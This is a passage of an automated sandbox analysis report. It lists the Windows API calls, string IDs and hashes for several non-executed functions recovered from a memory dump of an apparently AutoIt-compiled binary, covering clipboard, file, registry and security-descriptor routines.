                                                                                                          • Instruction ID: 2234b61345d6ad653d652e82b508955ad45a1bb8d8ff7362608d8391ccad6e24
                                                                                                          • Opcode Fuzzy Hash: 012e7b50eccd67ad77627e8dee5f50990fb6c57746bd8299ecc7abd969425133
                                                                                                          • Instruction Fuzzy Hash: 3BE092B9400B11CFC3315F1AE804462FBE4FFE13667254E2EE4E6A26B0D3B0589A8B50

                                                                                                          Non-executed Functions

                                                                                                          Function 00ECD164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
                                                                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00ECD208
                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00ECD249
                                                                                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00ECD28E
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00ECD2B8
                                                                                                          • SendMessageW.USER32 ref: 00ECD2E1
                                                                                                          • _wcsncpy.LIBCMT ref: 00ECD359
                                                                                                          • GetKeyState.USER32(00000011), ref: 00ECD37A
                                                                                                          • GetKeyState.USER32(00000009), ref: 00ECD387
                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00ECD39D
                                                                                                          • GetKeyState.USER32(00000010), ref: 00ECD3A7
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00ECD3D0
                                                                                                          • SendMessageW.USER32 ref: 00ECD3F7
                                                                                                          • SendMessageW.USER32(?,00001030,?,00ECB9BA), ref: 00ECD4FD
                                                                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00ECD513
                                                                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00ECD526
                                                                                                          • SetCapture.USER32(?), ref: 00ECD52F
                                                                                                          • ClientToScreen.USER32(?,?), ref: 00ECD594
                                                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00ECD5A1
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00ECD5BB
                                                                                                          • ReleaseCapture.USER32 ref: 00ECD5C6
                                                                                                          • GetCursorPos.USER32(?), ref: 00ECD600
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00ECD60D
                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00ECD669
                                                                                                          • SendMessageW.USER32 ref: 00ECD697
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00ECD6D4
                                                                                                          • SendMessageW.USER32 ref: 00ECD703
                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00ECD724
                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00ECD733
                                                                                                          • GetCursorPos.USER32(?), ref: 00ECD753
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00ECD760
                                                                                                          • GetParent.USER32(?), ref: 00ECD780
                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00ECD7E9
                                                                                                          • SendMessageW.USER32 ref: 00ECD81A
                                                                                                          • ClientToScreen.USER32(?,?), ref: 00ECD878
                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00ECD8A8
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00ECD8D2
                                                                                                          • SendMessageW.USER32 ref: 00ECD8F5
                                                                                                          • ClientToScreen.USER32(?,?), ref: 00ECD947
                                                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00ECD97B
                                                                                                            • Part of subcall function 00E429AB: GetWindowLongW.USER32(?,000000EB), ref: 00E429BC
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00ECDA17
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                          • String ID: @GUI_DRAGID$F
                                                                                                          • API String ID: 3977979337-4164748364
                                                                                                          • Opcode ID: 7efb15ef6a2137dbf9605e2cfe63515fa6b5ff790dabdb036e3551cfba944bd9
                                                                                                          • Instruction ID: 476b8c37507ca8b715036bdfa37c600ef43b195742ef240ef378fdeb08862ad5
                                                                                                          • Opcode Fuzzy Hash: 7efb15ef6a2137dbf9605e2cfe63515fa6b5ff790dabdb036e3551cfba944bd9
                                                                                                          • Instruction Fuzzy Hash: E7429A30609240AFC724DF28CD44FAABBE5FF88314F18152DF695A72A0C772E856DB51
                                                                                                          Function 00E98F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E99399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E993E3
                                                                                                            • Part of subcall function 00E99399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E99410
                                                                                                            • Part of subcall function 00E99399: GetLastError.KERNEL32 ref: 00E9941D
                                                                                                          • _memset.LIBCMT ref: 00E98F71
                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E98FC3
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00E98FD4
                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E98FEB
                                                                                                          • GetProcessWindowStation.USER32 ref: 00E99004
                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 00E9900E
                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E99028
                                                                                                            • Part of subcall function 00E98DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E98F27), ref: 00E98DFE
                                                                                                            • Part of subcall function 00E98DE9: CloseHandle.KERNEL32(?,?,00E98F27), ref: 00E98E10
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                          • String ID: $default$winsta0
                                                                                                          • API String ID: 2063423040-1027155976
                                                                                                          • Opcode ID: 91a0616a776276fc2037438fd722f7d175f0727b1030b0911e4a7c669832b005
                                                                                                          • Instruction ID: 8f06207d6723c67445157e906255c93c9a817ad9e28036b7a0065d52565d7bb6
                                                                                                          • Opcode Fuzzy Hash: 91a0616a776276fc2037438fd722f7d175f0727b1030b0911e4a7c669832b005
                                                                                                          • Instruction Fuzzy Hash: BA818EB1902209BFDF119FA9DD49AEE7BB9FF04308F09511AF910B6262D7328E14DB11
                                                                                                          Function 00EB4632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • OpenClipboard.USER32(00ED0980), ref: 00EB465C
                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EB466A
                                                                                                          • GetClipboardData.USER32(0000000D), ref: 00EB4672
                                                                                                          • CloseClipboard.USER32 ref: 00EB467E
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00EB469A
                                                                                                          • CloseClipboard.USER32 ref: 00EB46A4
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00EB46B9
                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00EB46C6
                                                                                                          • GetClipboardData.USER32(00000001), ref: 00EB46CE
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00EB46DB
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00EB470F
                                                                                                          • CloseClipboard.USER32 ref: 00EB481F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                          • String ID:
                                                                                                          • API String ID: 3222323430-0
                                                                                                          • Opcode ID: 3ee399c186b1f48e91b4bb46c96f3b399e934e46e6e7dc2e6ec8226e5db5b7d2
                                                                                                          • Instruction ID: 4ce4e52d444e273acbb51b0edcf175bb7e6e39ba0c870f7f6674256225764c04
                                                                                                          • Opcode Fuzzy Hash: 3ee399c186b1f48e91b4bb46c96f3b399e934e46e6e7dc2e6ec8226e5db5b7d2
                                                                                                          • Instruction Fuzzy Hash: 725171B12452016FD700EF61EC85FAF77A8EF84B11F04152AF956F21E2DF70D9088A62
                                                                                                          Function 00EAF5D8 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 119fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EAF5F9
                                                                                                          • _wcscmp.LIBCMT ref: 00EAF60E
                                                                                                          • _wcscmp.LIBCMT ref: 00EAF625
                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00EAF637
                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00EAF651
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00EAF669
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAF674
                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00EAF690
                                                                                                          • _wcscmp.LIBCMT ref: 00EAF6B7
                                                                                                          • _wcscmp.LIBCMT ref: 00EAF6CE
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00EAF6E0
                                                                                                          • SetCurrentDirectoryW.KERNEL32(00EFB578), ref: 00EAF6FE
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EAF708
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAF715
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAF727
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                          • String ID: *.*$S
                                                                                                          • API String ID: 1803514871-3360721001
                                                                                                          • Opcode ID: 56952cb2901867c7b823eec85342b0e4deca055cbfb31625e78b411f51d5be81
                                                                                                          • Instruction ID: e2e2938abb70baf3eed641ccf77e49027a2827c5bdf893117d2288d19be4e5ec
                                                                                                          • Opcode Fuzzy Hash: 56952cb2901867c7b823eec85342b0e4deca055cbfb31625e78b411f51d5be81
                                                                                                          • Instruction Fuzzy Hash: A231C57194221D6EDB10DBB5EC49AEE77ACEF4E325F141166F804F61A0DB30EA44CA60
                                                                                                          Function 00EACD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EACDD0
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EACE24
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EACE49
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EACE60
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EACE87
                                                                                                          • __swprintf.LIBCMT ref: 00EACED3
                                                                                                          • __swprintf.LIBCMT ref: 00EACF16
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                          • __swprintf.LIBCMT ref: 00EACF6A
                                                                                                            • Part of subcall function 00E638C8: __woutput_l.LIBCMT ref: 00E63921
                                                                                                          • __swprintf.LIBCMT ref: 00EACFB8
                                                                                                            • Part of subcall function 00E638C8: __flsbuf.LIBCMT ref: 00E63943
                                                                                                            • Part of subcall function 00E638C8: __flsbuf.LIBCMT ref: 00E6395B
                                                                                                          • __swprintf.LIBCMT ref: 00EAD007
                                                                                                          • __swprintf.LIBCMT ref: 00EAD056
                                                                                                          • __swprintf.LIBCMT ref: 00EAD0A5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                          • API String ID: 3953360268-2428617273
                                                                                                          • Opcode ID: aafddbc98f384979e6d3f7fae63d255a3474af2bd8364afe2095d76534d773f9
                                                                                                          • Instruction ID: 8b64b4f25b722ac3eb4178b216c4b47b18129764d38f2ba3389d72cdd6e62c69
                                                                                                          • Opcode Fuzzy Hash: aafddbc98f384979e6d3f7fae63d255a3474af2bd8364afe2095d76534d773f9
                                                                                                          • Instruction Fuzzy Hash: 93A13DB1504304ABC714EFA4D985EAFB7ECEF94705F40191AF585A7192EB30EA09CB62
                                                                                                          Function 00EC0EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EC0FB3
                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00ED0980,00000000,?,00000000,?,?), ref: 00EC1021
                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00EC1069
                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00EC10F2
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00EC1412
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EC141F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$ConnectCreateRegistryValue
                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                          • API String ID: 536824911-966354055
                                                                                                          • Opcode ID: 9b0bae9f2e2cf0f6eb0b78cc9d2eb1b7386874042296b02b546ca8ff7b0c410c
                                                                                                          • Instruction ID: ca25f3b702b9af328566cb9c4cb61a9eec89fc4cab420ae3d42656aa15cae8db
                                                                                                          • Opcode Fuzzy Hash: 9b0bae9f2e2cf0f6eb0b78cc9d2eb1b7386874042296b02b546ca8ff7b0c410c
                                                                                                          • Instruction Fuzzy Hash: BC0268756006019FCB14EF25D941F2AB7E5FF89714F04995CF89AAB2A2CB31EC46CB81
                                                                                                          Function 00EAF735 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 112fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EAF756
                                                                                                          • _wcscmp.LIBCMT ref: 00EAF76B
                                                                                                          • _wcscmp.LIBCMT ref: 00EAF782
                                                                                                            • Part of subcall function 00EA4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EA4890
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00EAF7B1
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAF7BC
                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00EAF7D8
                                                                                                          • _wcscmp.LIBCMT ref: 00EAF7FF
                                                                                                          • _wcscmp.LIBCMT ref: 00EAF816
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00EAF828
                                                                                                          • SetCurrentDirectoryW.KERNEL32(00EFB578), ref: 00EAF846
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EAF850
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAF85D
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAF86F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                          • String ID: *.*$j
                                                                                                          • API String ID: 1824444939-4121651432
                                                                                                          • Opcode ID: 255ab23b0d5e196fae583806e1c0a7b3cd2f070847318c26b9ab216bb13d4d8c
                                                                                                          • Instruction ID: fbca5264555b8a70ca9570adef4b10241074bdc19e0ccf13417dc96fbb4c8897
                                                                                                          • Opcode Fuzzy Hash: 255ab23b0d5e196fae583806e1c0a7b3cd2f070847318c26b9ab216bb13d4d8c
                                                                                                          • Instruction Fuzzy Hash: DB31263290120D6EDF149BF5EC48AEE77BCDF0E325F141166F804BA1A1DB34EE458A20
                                                                                                          Function 00E988CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E98E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E98E3C
                                                                                                            • Part of subcall function 00E98E20: GetLastError.KERNEL32(?,00E98900,?,?,?), ref: 00E98E46
                                                                                                            • Part of subcall function 00E98E20: GetProcessHeap.KERNEL32(00000008,?,?,00E98900,?,?,?), ref: 00E98E55
                                                                                                            • Part of subcall function 00E98E20: HeapAlloc.KERNEL32(00000000,?,00E98900,?,?,?), ref: 00E98E5C
                                                                                                            • Part of subcall function 00E98E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E98E73
                                                                                                            • Part of subcall function 00E98EBD: GetProcessHeap.KERNEL32(00000008,00E98916,00000000,00000000,?,00E98916,?), ref: 00E98EC9
                                                                                                            • Part of subcall function 00E98EBD: HeapAlloc.KERNEL32(00000000,?,00E98916,?), ref: 00E98ED0
                                                                                                            • Part of subcall function 00E98EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E98916,?), ref: 00E98EE1
                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E98931
                                                                                                          • _memset.LIBCMT ref: 00E98946
                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E98965
                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00E98976
                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00E989B3
                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E989CF
                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00E989EC
                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E989FB
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00E98A02
                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E98A23
                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00E98A2A
                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E98A5B
                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E98A81
                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E98A95
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3996160137-0
                                                                                                          • Opcode ID: 08de368cde62cdade763c01d28e120d1c4efa52b4a520fe927c77596f97fe404
                                                                                                          • Instruction ID: 07b5a8a9d1eb817b629838961c3a7b5d3fecf04874aeef5e471c3f0313b8c762
                                                                                                          • Opcode Fuzzy Hash: 08de368cde62cdade763c01d28e120d1c4efa52b4a520fe927c77596f97fe404
                                                                                                          • Instruction Fuzzy Hash: 89615871900209BFDF00DFA5ED45AEEBBBAFF45304F04812AE915B62A0DB719A04CB60
                                                                                                          Function 00EC0A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EC147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EC040D,?,?), ref: 00EC1491
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EC0B0C
                                                                                                            • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
                                                                                                            • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EC0BAB
                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EC0C43
                                                                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00EC0E82
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EC0E8F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1240663315-0
                                                                                                          • Opcode ID: f4b639b0033b922863d5811662fa823c9f95a3c7b23051c2cb73c71115ad5870
                                                                                                          • Instruction ID: 5223bd018a2a55b1217c01bb0ee2c3ef3f46415a1ffc7430a3dee09a35d5def5
                                                                                                          • Opcode Fuzzy Hash: f4b639b0033b922863d5811662fa823c9f95a3c7b23051c2cb73c71115ad5870
                                                                                                          • Instruction Fuzzy Hash: DCE16C71204210EFCB14DF29C990F6ABBE4EF89714F04996DF84AEB2A1DA31ED05CB51
                                                                                                          Function 00EA443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __swprintf.LIBCMT ref: 00EA4451
                                                                                                          • __swprintf.LIBCMT ref: 00EA445E
                                                                                                            • Part of subcall function 00E638C8: __woutput_l.LIBCMT ref: 00E63921
                                                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00EA4488
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00EA4494
                                                                                                          • LockResource.KERNEL32(00000000), ref: 00EA44A1
                                                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00EA44C1
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00EA44D3
